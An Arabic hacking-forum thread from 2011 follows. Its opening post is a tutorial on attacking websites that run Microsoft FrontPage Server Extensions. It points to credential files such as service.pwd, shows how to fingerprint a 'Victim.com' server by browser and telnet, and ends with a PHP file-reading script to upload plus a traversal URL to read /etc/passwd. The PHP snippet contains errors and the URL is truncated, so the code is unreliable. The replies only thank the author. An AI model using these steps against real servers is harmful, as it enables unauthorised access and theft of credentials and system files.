التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-30-2011, 05:15 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

.... ===***62;معلومات مهمة ***60;===


[align=center]السلام عليكم ورحمة الله تعالى و بركاته

" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "

ما الذي يجب أن تعرفه قبل قراءة هذا الدرس :

* الالمام بالانجليزية .
* قراءة المزيد عن الـ FrontPage Server Extensions و ليس كيفية اختراقه .
* كيفية التعامل مع برنامج Microsoft Office FrontPage .
* كيفية التعامل مع الـ CHMOD .
* كيفية التعامل مع الـ Telnet .
* كيفية التعامل مع بروتوكول HTTP .
* كيفية التعامل مع قواعد البيانات العلائقية SQL .
* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم Server Side Scripting Language .

و اذكر أخيراً بأني اؤمن بأن المخترق ما هو إلا انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و ليس انسان همه هو معرفة القليل
من الأمور التي تساعده في التخريب و العبث بما تعب به الآخرون و تضييع الوقت في الدردشة و التسكع بمقاهي الانترنت ، و لذا فافترض بأن
ما أقوله سيكون واضحاً و لا يحتاج لـ Screen Capture .

@ خريطة الموضوع :

. ما الذي ستسفيده عند قراءة الموضوع ؟
. مقدمة
. ما هو الـ FrontPage Server Extensions ؟
. ما هي آلية عمل الـ FrontPage Extension Server ؟
. كيفية الاتصال بـ FrontPage Extension Server
. كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا
. كيفية استغلاله ليصبح في صلاحك


@ ما الذي ستستفيده عند قراءتك للموضوع ؟

* ستعرف ما هو الـ FrontPage Server Extensions .
* آلية عمله .
* كيفية جمع المعلومات الخاصة بأي موقع .
* بعض الطرق للاستفادة منه عند الاتصال بالخادم الخاص به .

@ مقدمة :

تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملائها ، فتجدهم يقدمون العروض و التخفيضات لارضاء العملاء مثل دعم لـ PHP و
CGI و Perl و SSL و FTP و SQL .

و بالنسبة لمدارء المواقع Webmasters فإن البرنامج المفضل لهم لتصميم مواقعهم هو Microsoft Office FrontPage و الذي كما هو مبين يأتي
مع حزمة Office ، اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ، و لذا تقدم شركات التسكين دعم كامل للبرنامج .

@ ما هو الـ FrontPage Server Extensions ؟

( ملاحظة : سأتكلم حالياً عن الحزم التي أتت بعد حزمة الاصدار الثاني )

هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم Server الخاص بشركة التسكين التي لها قالبية لدعم بعض الخصائص .

و عند التثبيت يجب انشاء عدة مجلدات منها :

/_private
/_vti_bin
/_vti_cnf
/_vti_log
/_vti_pvt
/_vti_txt

و سأتكلم عن وظيفة كل مجلد يهمنا :

* المجلد _vti_bin :

و يتواجد بداخله مجلدان هما :

( ملاحظة : النقطتان تشيران إلى المجلد _vti_bin )

../_vti_adm/
../_vti_aut/

الثاني لا يهمنا بقدر ما يهم المجلد الأول اذ أنه الخاص بالمشرف ولا تستطيع الاستفادة منه اذا لم تحصل على كلمة المرور الخاصة به .
كما يوجد ملفان هما :

../shtml.exe
../fpcount.exe

* المجلد _vti_pvt :

و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية :

- الملف service.pwd : و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس DES .
- الملف service.grp : و فيه يتواجد المعرفين من مشرفين و authors .
- ملفي deptodoc.btr و doctodep.btr : و فيه يتواجد مسارات الملفات التي تم تحميلها على الخادم ، فاذا قمت بتنزيله فتستطيع معرفة الملفات
الموجودة بالموقع .

و في الغالب لا تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف .htaccess يقوم بمنع الجميع ( المالك و المجموعة و
الزوار ) من معاينة المجلد و محتوياته .

( ملاحظة : ان عدم وضع أي صلاحية على المجلدلا يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية )

* المجلد _private :

و يتواجد بداخله ملف واحد فقط هو .htaccess .

@ ما هي آلية عمل الـ FrontPage Extension Server ؟

يعتمد الاتصال بين العميل و الـ FrontPage Extension Server على بروتوكول الـ HTTP .

فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ FrontPage فانه يتم ارسال طلب Request للخادم ثم يمرره الخادم بالـ FrontPage Extension Server
و الذي يمرره بالتالي ببرمجيات الخادم مثل fpcount.exe ، و من ثم يكرر تمريره مرة أخرى إلى الـ Extension Server و إلى الخادم و يظهر المخرجات
لـ العميل ، علماً ان هذه الاتصالات تتم عبر جدار نار .

@ كيفية الاتصال بـ FrontPage Extension Server :

كما ذكرنا سابقاً ان أغلب شركات التسكين تسعى لراحة العملاء ، فتجدها تدعم خدمة الـ FrontPage و ذلك لتحميل الصفحات للموقع علماً بأنها
تدعم بروتوكول الـ FTP و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتماداً على البرمجيات التي تعمل بناحية الخادم .
و الآن قم بتنفيذ التالي لمعرفة كيفية الاتصال بالـ FrontPage Extension Server :

( ملاحظة : سأتكلم حالياً عن حزمة الـ XP و التي لا تختلف أبداً عن الحزم الباقية إلا في بعض النقاط الشكلية )

* قم بتشغيل برنامج الـ FrontPage و الذي يأتي مرفقاً مع حزمة Office .
* من قائمة File قم باختيار Open Web .
* قم باضافة المعرف و كلمة المرور ( الأصلية و ليست المشفرة ) .
* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و المجلدات و معاينة الشفرة المصدرية
للملفات .
* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع لا يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و يطلب منك معاينتها في وضعية القراءة و لا
يظهر لك الشفرة المصدرية الأصلية ولا المجلدات و الملفات التي يحويها الموقع .

@ كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا :

يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها :

* معاينة ملف نجاح التثبيت :

( ملاحظة : قد لا تجد ملف _vti_inf.html و لكن هذا لا يعني أن الموقع لا يدعم الخدمة ، كما أنه لا يعتبر ثغرة )

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية ملف _vti_inf.html بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :

http://www.Victim.com/_vti_inf.html

- و عند معاينة الصفحة ستجد جملة FrontPage Configuration Information ، فهذا معناه أن حزمة الـ FrontPage Extension Server قد تم تثبيتها
في الخادم بنجاح .

و لمعرفة اصدارة الخدمة قم بالتالي :

- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن FPVersion="Version" حيث Version تشير للاصدار الخاص بالخدمة .

* عن طريق مجلد _vti_cnf :

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :

http://www.Victim.com/_vti_cnf

- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن الشفرة التالية :

vti_generator:Programe

- حيث Programe يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو Microsoft FrontPage X و الاصدارة الخاصة به هي X .

* الكشف عن الشفرة المصدرية للصفحة :

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث بين ترميزي الرأس <Head></Head> عن الشفرة التالية :

<Meta Name="GENERATOR" Content="Programe">

- حيث Programe يرمز لنوع البرنامج و اذا كان البرنامج هو Microsoft FrontPage X.0 يتبين لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و
الاصدارة الخاصة به هي X .

* عن طريق موقع NetCraft :

- قم بزيارة الموقع NetCraft.net .
- قم بكتابة عنوان الموقع مستثنياً الـ http:// .
- انتظر بضع ثواني .
- ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة قابلية دعمه للبرنامج ، و من تلك الخدمات
خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X حيث X يرمز لاصدارة الـ FrontPage Extensions Server .

* عن طريق الـ Telnet :

( ملاحظة : تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات الطريقة السابقة )

- من قائمة Start قم باختيار Run و اكتب بالنافذة التي ستظهر Telnet .
- قم بالاتصال بالموقع عبر المنفذ 80 بالشكل التالي :

Microsoft Telnet> Open www.Victim.com 80

- قم بارسال طلب Request للخادم و لتكن الطريقة Method هي Head .

( ملاحظة : عليك الالمام بكيفية التعامل مع بروتوكول HTTP )

- قم بارسال التالي حيث http://www.Victim.net هو الموقع الضحية و ISP.net هو البروكسي الخاص بمزود الخدمة الخاص بك :

Head www.Victim.net HTTP/1.1
Host: ISP.net
Accept: */*
Connection: close

- انتظر بضع ثواني .
- ستستلم الاجابة Response عن الطلب الذي ارسلتهب للخادم Server مثل تاريخ آخر تعديل للصفحة و نوع الملقم و الخدمات المتوفرة به .
و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X
حيث X يرمز لاصدارة الـ FrontPage Extensions Server .

@ كيفية استغلاله ليصبح في صالحك :

اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلاحيات على مجلد الـ _vti_pvt قم بالتالي :

( ملاحظة : عليك الالمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ PHP ، كما أن على الموقع الضحية دعم هذه اللغة )

* قم بالاتصال بالموقع الضحية .
* قم بتحميل ملف ينتهي امتداده بـ PHP و ضمنه التالي :

<?PHP

$open = FOpen($file, "r");
$get = FGets($open, FileSize($file));

Echo $get;

FClose $open;

?>

و قمنا هنا برفع ملف PHP للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت ثم يعرضه ثم يغلق الملف ، و الآن كل
ما عليك فعله الآن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير file و الملف الذي تريد معاينة الشفرة
المصدرية الخاصة به ، مثال :

http://www.Victim.com/uploded_file...../../etc/passwd

حيث uploded_file يشير لاسم الملف الذي قمت بتحميله ، و تستطيع اضافة اوامر تسمح لك بمعاينة الملفات و المجلدات الموجودة في الخادم .
المرجو التقييم و ان امكن التثبيت في امان الله[/align]




===***62;lug,lhj lilm ***60;===

   

رد مع اقتباس
قديم 01-30-2011, 05:24 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية hakerdix
 

 

 
إحصائية العضو








hakerdix غير متواجد حالياً

إرسال رسالة عبر MSN إلى hakerdix

 

 

إحصائية الترشيح

عدد النقاط : 10
hakerdix is on a distinguished road

افتراضي


[rainbow]شكرا اخي على الموضوع واصل[/rainbow]

   

رد مع اقتباس
قديم 01-30-2011, 05:27 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة hakerdix
[rainbow]شكرا اخي على الموضوع واصل[/rainbow]

[align=center]لا شكر على الواجب يا اخي[/align]

   

رد مع اقتباس
قديم 02-09-2011, 04:11 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






sirache magma غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
sirache magma is on a distinguished road

افتراضي


الله يعطيك العافيه

التوقيع

http://www.tunisienumerique.com/wp-c...bladimaroc.jpg

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:14 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0